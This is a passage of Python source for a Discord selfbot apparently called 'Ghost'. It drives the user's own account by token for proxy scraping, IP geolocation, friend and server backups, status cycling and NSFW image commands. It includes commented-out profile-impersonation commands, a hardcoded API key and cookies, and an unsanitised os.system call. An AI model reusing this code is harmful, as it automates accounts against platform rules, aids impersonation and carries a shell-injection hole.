embed = discord.Embed(title=f"Text mode is already enabled.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Text mode is already enabled.", delete_after=__deletetimeout__)
@Ghost.command(name="readall", description="Mark every message as read.", usage="readall")
async def readall(ctx):
index = 0
index2 = 0
DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
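# Grab the newest message ID from every text channel and bulk-acknowledge them through discum so Discord marks them as read.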
for guild in Ghost.guilds:
messages2 = []
for channel in guild.text_channels:
index+=1
try:
messages = await channel.history(limit=1, oldest_first=False).flatten()
for message in messages:
index2+=1
messages2.append({"channel_id": str(channel.id), "message_id": str(message.id)})
print_info(f"({channel.name}) Fetched new messages to read.")
except:
pass
DiscumClient.bulkAck(messages2)
print_info(f"Read all messages in {guild.name}.")
print_info("All messages have been read.")
await ctx.send(f"Read a total of `{index}` channels and `{index2}` messages.")
@Ghost.command(name="specs", description="Your computer's specifications.", usage="specs", aliases=["computerspecs", "pcspecs", "specifications", "systeminfo"])
async def specs(ctx):
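# get_size converts a raw byte count into a human-readable string (KB, MB, GB, ...).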
def get_size(bytes, suffix="B"):
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
uname = platform.uname()
svmem = psutil.virtual_memory()
system = uname.system
machine = uname.machine
cpu = platform.processor()
ram = str(get_size(svmem.used)) + "/" + str(get_size(svmem.total))
gpus = []
for gpu in GPUtil.getGPUs():
gpus.append(gpu.name)
if not gpus:
gpus = ["N/A"]
if __embedmode__:
embed = discord.Embed(title="Specifications", color=__embedcolour__)
embed.add_field(name="System", value=f"```{system}```")
embed.add_field(name="Machine", value=f"```{machine}```")
embed.add_field(name="RAM", value=f"```{ram}```")
embed.add_field(name="CPU", value=f"```{cpu}```")
embed.add_field(name="GPUs", value=f"```{', '.join(gpus)}```")
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_thumbnail(url=__embedimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Specifications ]
System: {system}
Machine: {machine}
CPU: {cpu}
GPUs: {', '.join(gpus)}
RAM: {ram}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="crypto", description="Get the current data on a cryptocurrency.", usage="crypto [currency]", aliases=["cryptodata", "cryptostats"])
async def crypto(ctx, *, currency="bitcoin"):
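# Query the CoinGecko /coins/{id} endpoint for community/developer scores and current prices.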
request = requests.get(f"https://api.coingecko.com/api/v3/coins/{currency}")
if request.status_code == 200:
request = request.json()
if __embedmode__:
embed = discord.Embed(title=f"{request['name']} Data", color=__embedcolour__)
embed.add_field(name="Scores", value=f"""```
Coingecko score: {request['coingecko_score']}
Liquidity score: {request['liquidity_score']}
Developer score: {request['developer_score']}
Community score: {request['community_score']}
```""", inline=False)
embed.add_field(name="Current Prices", value=f"""```
USD: {'{:,}'.format(request['market_data']['current_price']['usd'])}
CAD: {'{:,}'.format(request['market_data']['current_price']['cad'])}
AUD: {'{:,}'.format(request['market_data']['current_price']['aud'])}
GBP: {'{:,}'.format(request['market_data']['current_price']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['current_price']['eur'])}
```""", inline=False)
embed.add_field(name="Last 24h Price Change", value=f"""```
USD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['usd'])}
CAD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['cad'])}
AUD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['aud'])}
GBP: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['eur'])}
```""", inline=False)
embed.set_thumbnail(url=request["image"]["large"])
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ {request['name']} Data ]
[Scores]
Coingecko score: {request['coingecko_score']}
Liquidity score: {request['liquidity_score']}
Developer score: {request['developer_score']}
Commuinity score: {request['community_score']}
[Current Prices]
USD: {'{:,}'.format(request['market_data']['current_price']['usd'])}
CAD: {'{:,}'.format(request['market_data']['current_price']['cad'])}
AUD: {'{:,}'.format(request['market_data']['current_price']['aud'])}
GBP: {'{:,}'.format(request['market_data']['current_price']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['current_price']['eur'])}
[Last 24h Price Change]
USD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['usd'])}
CAD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['cad'])}
AUD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['aud'])}
GBP: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['eur'])}
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title="Invalid Crypto", description="That crypto currency doesnt exist or there was an error.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Invalid Crypto ]
That crypto currency doesnt exist or there was an error.
# {__embedfooter__}
```""")
@Ghost.command(name="proxies", description="Scrape an type of proxy.", usage="proxies [http, https, socks4, socks5, all]", aliases=["proxygen", "genproxies", "proxyscrape"])
async def proxies(ctx, type):
if type == "http":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/http.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=http&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTP proxies.", file=discord.File("data/proxies/http.txt"))
if type == "https":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/https.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=https&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTPS proxies.", file=discord.File("data/proxies/https.txt"))
if type == "socks4":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/socks4.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` SOCKS4 proxies.", file=discord.File("data/proxies/socks4.txt"))
if type == "socks5":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/socks5.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` SOCKS5 proxies.", file=discord.File("data/proxies/socks5.txt"))
if type == "all":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/all.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=all&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.", file=discord.File("data/proxies/all.txt"))
# @Ghost.command(name="stealusername", description="Steal someones username.", usage="stealusername [@user]", aliases=["stealname"])
# async def stealusername(ctx, user:discord.User):
# DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# username = user.name
# DiscumClient.setUsername(username)
# await ctx.send(f"Stolen `{user}`'s username.", delete_after=__deletetimeout__)
# @Ghost.command(name="stealprofile", description="Steal someones avatar and username.", usage="stealprofile [@user]")
# async def stealprofile(ctx, user:discord.User):
# DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# avatar = user.avatar
# username = user.name
# extension = str(avatar)[:-10][-3:]
# open(f"data/pfpstealavatar.{extension}", "wb").write(requests.get(str(avatar), allow_redirects=True).content)
# DiscumClient.setAvatar(f"data/pfpstealavatar.{extension}")
# DiscumClient.setUsername(username)
@Ghost.command(name="cloneemoji", description="Clone an emoji to the command server.", usage="cloneemoji [emoji]", aliases=["stealemoji", "emojisteal", "copyemoji"])
async def cloneemoji(ctx, *, msg):
msg = re.sub("<:(.+):([0-9]+)>", "\\2", msg)
match = None
exact_match = False
for guild in Ghost.guilds:
for emoji in guild.emojis:
if msg.strip().lower() in str(emoji):
match = emoji
if msg.strip() in (str(emoji.id), emoji.name):
match = emoji
exact_match = True
break
if exact_match:
break
if not match:
return await ctx.send("Couldnt find that emoji.")
response = requests.get(match.url)
emoji = await ctx.guild.create_custom_emoji(name=match.name, image=response.content)
await ctx.send(f"Successfully cloned `{emoji.name}`.")
@Ghost.command(name="detections", description="A list of all detections.", usage="detections", aliases=["triggers"])
async def detections(ctx):
cfg = Config.getConfig()
_list = []
for key, value in cfg["detections"].items():
if __embedmode__:
_list.append(f"**{key}** : {value}")
else:
_list.append(f"{key} : {value}")
if __embedmode__:
embed = discord.Embed(title="Detections", description='\n'.join(_list), color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("```ini\n[ Detections ]\n " + "\n".join(_list) + "\n\n# " + __embedfooter__ + "```")
@Ghost.command(name="snipers", description="A list of all snipers.", usage="snipers")
async def snipers(ctx):
cfg = Config.getConfig()
_list = []
for key, value in cfg["snipers"].items():
if __embedmode__:
_list.append(f"**{key}** : {value}")
else:
_list.append(f"{key} : {value}")
if __embedmode__:
embed = discord.Embed(title="Snipers", description='\n'.join(_list), color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("```ini\n[ Snipers ]\n " + "\n".join(_list) + "\n\n# " + __embedfooter__ + "```")
@Ghost.command(name="enabledetect", description="Enable a detection.", usage="enabledetect [type]", aliases=["enabledetection", "enabledetections"])
async def enabledetect(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["detections"].items():
if type.lower() == key.lower():
cfg["detections"][key] = True
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Enabled `{type}` detection.")
else:
await ctx.send(f"Couldnt find `{type}` detection.")
@Ghost.command(name="disabledetect", description="Disable a detection.", usage="disabledetect [type]", aliases=["disabledetection", "disabledetections"])
async def disabledetect(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["detections"].items():
if type.lower() == key.lower():
cfg["detections"][key] = False
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Disabled `{type}` detection.")
else:
await ctx.send(f"Couldnt find `{type}` detection.")
@Ghost.command(name="enablesniper", description="Enable a sniper.", usage="enablesniper [type]", aliases=["enablesnipers"])
async def enablesniper(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["snipers"].items():
if type.lower() == key.lower():
cfg["snipers"][key] = True
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Enabled `{type}` sniper.")
else:
await ctx.send(f"Couldnt find `{type}` sniper.")
@Ghost.command(name="disablesniper", description="Disable a sniper.", usage="disablesniper [type]", aliases=["disablesnipers"])
async def disablesniper(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["snipers"].items():
if type.lower() == key.lower():
cfg["snipers"][key] = False
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Disabled `{type}` sniper.")
else:
await ctx.send(f"Couldnt find `{type}` sniper.")
# @Ghost.command(name="ghostusers", description="Finds all the people using Ghost in a server.", usage="ghostusers")
# @commands.guild_only()
# async def ghostusers(ctx):
# message = await ctx.send("Looking for people that have Ghost, this may take a while...")
# ghostUsers = []
# userAgent = get_random_user_agent()
# try:
# await ctx.message.delete()
# except:
# pass
# DiscumClient = discum.Client(token=__token__, user_agent=f"{userAgent}")
# @DiscumClient.gateway.command
# def getmembers(resp):
# guild_id = f'{ctx.guild.id}'
# channel_id = f'{ctx.channel.id}'
# if resp.event.ready_supplemental:
# DiscumClient.gateway.fetchMembers(guild_id, channel_id, wait=1)
# if DiscumClient.gateway.finishedMemberFetching(guild_id):
# DiscumClient.gateway.removeCommand(getmembers)
# DiscumClient.gateway.close()
# DiscumClient.gateway.run()
# for memberID in DiscumClient.gateway.session.guild(f'{ctx.guild.id}').members:
# member = await ctx.guild.fetch_member(int(memberID))
# ghostguild = await Ghost.fetch_guild(838869729829191681)
# mutualGuilds = member.mutual_guilds
# for guild in mutualGuilds:
# print(guild.name)
# DiscumClient.gateway.close()
# if __embedmode__:
# embed=discord.Embed(
# title="Ghost Users",
# description=f"There are a total of `{len(ghostUsers)}` Ghost users in `{ctx.guild.name}`\n \n```\n" + ", ".join(ghostUsers) + f"\n```",
# color=__embedcolour__
# )
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await message.edit(content="", embed=embed)
# else:
# await message.edit(content=f"""```ini
# [ Ghost Users ]
# There is a total of {len(ghostUsers)} in {ctx.guild.name}.
# {', '.join(ghostUsers)}
# # {__embedfooter__}
# ```""")
@Ghost.command(name="addccmd", description="Add a custom command.", usage="addccmd [name] [response]", aliases=["addcustomcommand", "addusercommand"])
async def addccmd(ctx, name, *, response):
global ccmd
customCommands = json.load(open("customcommands.json"))
customCommands[name] = response
json.dump(customCommands, open("customcommands.json", "w"), indent=4, sort_keys=False)
ccmd = json.load(open("customcommands.json"))
await ctx.send(f"Added `{Ghost.command_prefix}{name}` to your custom commands.", delete_after=__deletetimeout__)
@Ghost.command(name="delccmd", description="Remove a custom command.", usage="delccmd [name]", aliases=["deletecustomcommand", "delcustomcommand", "removecustomcommand", "removeccmd", "deleteccmd"])
async def delccmd(ctx, name):
global ccmd
customCommands = json.load(open("customcommands.json"))
customCommands.pop(name)
json.dump(customCommands, open("customcommands.json", "w"), indent=4, sort_keys=False)
ccmd = json.load(open("customcommands.json"))
await ctx.send(f"Removed `{Ghost.command_prefix}{name}` from your custom commands", delete_after=__deletetimeout__)
@Ghost.command(name="boobs", description="Pictures or videos of boobs.", usage=f"boobs", aliases=["tits", "tit", "milkers", "titties", "boob", "melons"])
async def boobs(ctx):
type = "boobs"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
@Ghost.command(name="ass", description="Pictures or videos of ass.", usage=f"ass", aliases=["badonkadonk"])
async def ass(ctx):
type = "ass"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@Ghost.command(name="pussy", description="Pictures or videos of pussy.", usage=f"pussy")
async def pussy(ctx):
type = "pussy"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@Ghost.command(name="porngif", description="Porn gifs.", usage=f"porngif")
async def porngif(ctx):
type = "porngif"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@Ghost.command(name="neko", description="Pictures or videos of nsfw nekos.", usage=f"hentai", aliases=["nsfwneko"])
async def hentai(ctx):
type = random.randint(1, 2)
if type == 1:
image = requests.get("https://nekos.life/api/lewd/neko").json()["neko"]
elif type == 2:
image = requests.get("https://nekos.life/api/v2/img/nsfw_neko_gif").json()["url"]
if __embedmode__:
embed = discord.Embed(title=f"hentai", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
@Ghost.command(name="discordtheme", description="Change default Discord theme.", usage="discordtheme [light/dark]")
async def discordtheme(ctx, theme = "dark"):
theme = theme.lower()
validThemes = ["dark", "light"]
if theme in validThemes:
DiscumClient = discum.Client(token=__token__, user_agent=get_random_user_agent(), log=False)
DiscumClient.setTheme(theme)
await ctx.send(f"Set Discord theme to `{theme}`.", delete_after=__deletetimeout__)
else:
await ctx.send("That isn't a valid Discord theme.", delete_after=__deletetimeout__)
@Ghost.command(name="changehypesquad", description="Change your hypesquad house.", usage="changehypesquad [bravery/brilliance/balance]")
async def changehypesquad(ctx, house):
house = house.lower()
houses = ["bravery", "brilliance", "balance"]
if house in houses:
DiscumClient = discum.Client(token=__token__, user_agent=get_random_user_agent(), log=False)
DiscumClient.setHypesquad(house)
await ctx.send(f"Changed your hypesquad house to `{house[:1].upper() + house[1:].lower()}`.", delete_after=__deletetimeout__)
else:
await ctx.send("That isn't a valid hypesquad house.", delete_after=__deletetimeout__)
@Ghost.command(name="backupfriends", description="Backup all your friend's user IDs to a file.", usage="backupfriends", aliases=["friendbackup"])
async def backupfriends(ctx):
print_info("Grabbing all friends...")
request = requests.get("https://discord.com/api/v6/users/@me/relationships", headers={"authorization": __token__})
json = request.json()
ids = []
blockedIds = []
incoming = []
outgoing = []
for item in json:
if item["type"] == 1:
print_info(f'Backed up {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}!')
ids.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 2:
print_info(f'Backed up a blocked user : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
blockedIds.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 3:
print_info(f'Backed up an incoming friend request : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
incoming.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 4:
print_info(f'Backed up an outgoing friend request : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
outgoing.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
print_info("Backed up all friends!")
await ctx.send(f"Backed up a total of `{len(ids)}` friends, `{len(blockedIds)}` blocked, `{len(outgoing)}` outgoing friend requests and `{len(incoming)}` incoming friend requests to __data/friends.txt__.", delete_after=__deletetimeout__)
if not ids:
ids.append("Couldnt find any friends.")
if not blockedIds:
blockedIds.append("Couldnt find any blocked users.")
if not outgoing:
outgoing.append("Couldnt find any outgoing friend requests.")
if not incoming:
incoming.append("Couldnt find any incoming friend requests.")
file = codecs.open("data/friends.txt", "w", encoding="utf-8")
file.write(
"Current Friends\n===============\n" + "\n".join(ids) +
"\n \nOutgoing Requests\n=================\n" + "\n".join(outgoing) +
"\n \nIncoming Requests\n=================\n" + "\n".join(incoming) +
"\n \nBlocked Users\n=============\n" + "\n".join(blockedIds)
)
file.close()
@Ghost.command(name="backupservers", description="Backup all your servers and try to create invites for each one.", usage="backupservers", aliases=["backupguilds", "serverbackup", "guildbackup"])
async def backupservers(ctx):
DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
try:
await ctx.message.delete()
except:
pass
print_info("Saving and creating invites for your guilds with a 4 second interval...")
guilds = requests.get("https://discordapp.com/api/v6/users/@me/guilds", headers={"authorization": __token__}).json()
print_info("Grabbing all the guilds...")
guildsIdsAndInvites = []
for item in guilds:
guildid = item["id"]
guildname = item["name"]
invite = ""
print_info(f"Trying to create invite for {guildname}")
server = discord.utils.get(Ghost.guilds, id=int(guildid))
for channel in server.text_channels:
if invite == "":
invite = DiscumClient.createInvite(str(channel.id))
if invite.status_code == 200:
invite = invite.json()["code"]
else:
invite = ""
break
if invite == "":
invite = "Failed to create an invite."
guildsIdsAndInvites.append(item["name"] + " : " + str(item["id"]) + " : discord.gg/" + str(invite))
await asyncio.sleep(4)
print_info(f"Saved guilds data.")
file = codecs.open("data/servers.txt", "w", encoding="utf-8")
file.write("\n".join(guildsIdsAndInvites))
file.close()
await ctx.send("Saved a list of all your guilds and their IDs in __data/servers.txt__.", delete_after=__deletetimeout__)
@Ghost.command(name="richpresence", description="Enable or disable rich presence.", usage="richpresence [on/off]", aliases=["rpc"])
async def richpresence(ctx, status):
if status == "on" or status == "On":
richpresence = json.load(open("richpresence.json"))
richpresence["enabled"] = True
json.dump(richpresence, open('richpresence.json', 'w'), sort_keys=False, indent=4)
await ctx.send("Rich presence has been enabled, restarting to change effect...", delete_after=__deletetimeout__)
restart_bot()
elif status == "off" or status == "Off":
richpresence = json.load(open("richpresence.json"))
richpresence["enabled"] = False
json.dump(richpresence, open('richpresence.json', 'w'), sort_keys=False, indent=4)
await ctx.send("Rich presence has been disabled, restarting to change effect...", delete_after=__deletetimeout__)
restart_bot()
@Ghost.command(name="spacechannel", description="Create a channel with spaces.", usage="spacechannel [channel name]")
async def spacechannel(ctx, *, channelName = "example channel name"):
channelName = channelName.replace(" ", channelBlankChar)
await ctx.guild.create_text_channel(name=channelName)
if __embedmode__:
embed = discord.Embed(title=f"Space Channel", description=f"Created a channel with the name `{channelName}`.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Space Channel ]
Created a channel with the name {channelName}.
# {__embedfooter__}
```""")
@Ghost.command(name="uwu", description="Translate your messages to uwu!", usage="uwu [message]")
async def uwu__(ctx, *, message):
uwued = uwuify.uwu(message)
await ctx.send(uwued)
@Ghost.command(name="uwuify", description="Automatically translate all your sent messages to uwu!", usage="uwuify")
async def uwuify__(ctx):
global uwuifyEnabled
if (uwuifyEnabled):
uwuifyEnabled = False
await ctx.send("All your messages will no longer be translated to uwu.", delete_after=__deletetimeout__)
else:
uwuifyEnabled = True
await ctx.send("All your messages will now be translated to uwu.", delete_after=__deletetimeout__)
@Ghost.command(name="geoip", description="Get information from an IP address.", usage="geoip [ip]", aliases=["iplookup", "lookupip", "ipinfo", "iplocation"])
async def geoip(ctx, ip):
data = requests.get(f"http://ip-api.com/json/{ip}").json()
data2 = requests.get(f"https://ipqualityscore.com/api/json/ip/oOswzMILsf8QA7JGtaQDdXARfDtbKW1K/{ip}").json()
country = data["country"]
city = data["city"]
zipCode = data["zip"]
lat = data["lat"]
lon = data["lon"]
isp = data["isp"]
as1 = data["as"]
region = data["regionName"]
vpn = data2["vpn"]
hostname = data2["host"]
if __embedmode__:
embed = discord.Embed(title=f"{ip} information...", color=__embedcolour__)
embed.add_field(name="Country", value=f"```{country}```", inline=False)
embed.add_field(name="City", value=f"```{city}```", inline=True)
embed.add_field(name="Region", value=f"```{region}```", inline=True)
embed.add_field(name="ZIP", value=f"```{zipCode}```", inline=True)
embed.add_field(name="LAT", value=f"```{lat}```", inline=True)
embed.add_field(name="LON", value=f"```{lon}```", inline=True)
embed.add_field(name="VPN", value=f"```{vpn}```", inline=True)
embed.add_field(name="AS", value=f"```{as1}```", inline=False)
embed.add_field(name="ISP", value=f"```{isp}```", inline=False)
embed.add_field(name="Hostname", value=f"```{hostname}```", inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {ip} information.. ]
Country: {country}
City: {city}
Region: {region}
ZIP: {zipCode}
LAT: {lat}
LON: {lon}
VPN: {vpn}
AS: {as1}
ISP: {isp}
Hostname: {hostname}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="invite", description="Get Ghost's Discord server invite link.", usage="invite", aliases=["serverinvite", "serverinv"])
async def invite(ctx):
print_info(f"Discord server invite: {discordServer}")
@Ghost.command(name="pytoexe", description="Convert a PY file to an executable.", usage="pytoexe [path]", aliases=["pythontoexe", "py2exe", "python2exe"])
async def pytoexe(ctx, *, path):
pyFile = False
file = path.split("/")[-1]
if (file.endswith(".py")):
pyFile = True
if (pyFile):
file = file[:-3]
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="Conversion for your file has started, check the console for more information.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
message = await ctx.send(embed=embed)
else:
message = await ctx.send(f"""```ini
[ PY To Executable ]
Conversion for your file has started, check the console for more information.
# {__embedfooter__}
```""")
print_info("Converting your file to an exe using pyinstaller...\nThis will fill your console and possibly take a while.")
os.system(f'pyinstaller -n "{file}" -i "icon.ico" --onefile --distpath "pytoexe/" {path}')
print_info("Conversion complete!")
print(f"{fg.cYellow}Path: {fg.cGrey}pytoexe/{file}.exe")
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="Conversion for your file has completed! Check the console for more information.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ PY To Executable ]
Converstion for your file has completed! Check the console for more information.
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="The path you submitted does not link to a PY file.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ PY To Executable ]
The path you submitted does not link to a PY file.
# {__embedfooter__}
```""")
@Ghost.command(name="statuscycle", description="Start a custom status cycle.", usage="statuscycle", aliases=["cyclestatus"])
async def statuscycle(ctx):
global cycleStatus
if (cycleStatus is False):
cycleStatus = True
else:
cycleStatus = False
def changeStatus(text2, token):
url = "https://discordapp.com/api/v8/users/@me/settings"
payload="{\r\n \"custom_status\": {\r\n \"text\": \"" + text2 + "\"\r\n }\r\n}"
headers = {
'Authorization': token,
'Content-Type': 'application/json',
'Cookie': '__cfduid=d7e8d2784592da39fb3f621664b9aede51620414171; __dcfduid=24a543339247480f9b0bb95c710ce1e6'
}
requests.request("PATCH", url, headers=headers, data=payload)
async def loopStatus(text):
while cycleStatus is True:
for word in text.split(" "):
changeStatus(word, __token__)
await asyncio.sleep(1)
Ghost.loop.create_task(loopStatus(cycleStatusText))
if (cycleStatus is True):
await ctx.send(f"Now looping your custom status.", delete_after=__deletetimeout__)
else:
await ctx.send(f"No longer looping your custom status.", delete_after=__deletetimeout__)
@Ghost.command(name="statuscycletext", description="Set the text used in status cycle.", usage="statuscycletext [text]", aliases=["cyclestatustext"])
async def statuscycletext(ctx, *, text: str):
global cycleStatusText
cycleStatusText = text
await ctx.send(f"Status cycle text set to `{cycleStatusText}`", delete_after=__deletetimeout__)
@Ghost.command(name="ghostping", description="Ping a user then delete the message.", usage="ghostping [@user]")
async def ghostping(ctx, user: discord.User):
pass
@Ghost.command(name="getmessage", description="Get a message by ID.", usage="getmessage [message id]", aliases=["fetchmessage", "getmsg", "fetchmsg"])
async def getmessage(ctx, messageid: int):
msg = await ctx.send("Getting the message . . .")
message = await get_message(ctx, messageid)
if __embedmode__:
embed = discord.Embed(title=f"Get Message", color=__embedcolour__)
embed.add_field(name="Content", value=f"```{message.content}```", inline=True)
embed.add_field(name="Author", value=f"```{message.author}```", inline=True)
embed.add_field(name="Message Link", value=message.jump_url, inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await msg.edit(content="", embed=embed, delete_after=__deletetimeout__)
else:
await msg.edit(content=f"""```ini
[ Get Message ]
Content: {message.content}
Author: {message.author}
Message Link: {message.jump_url}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
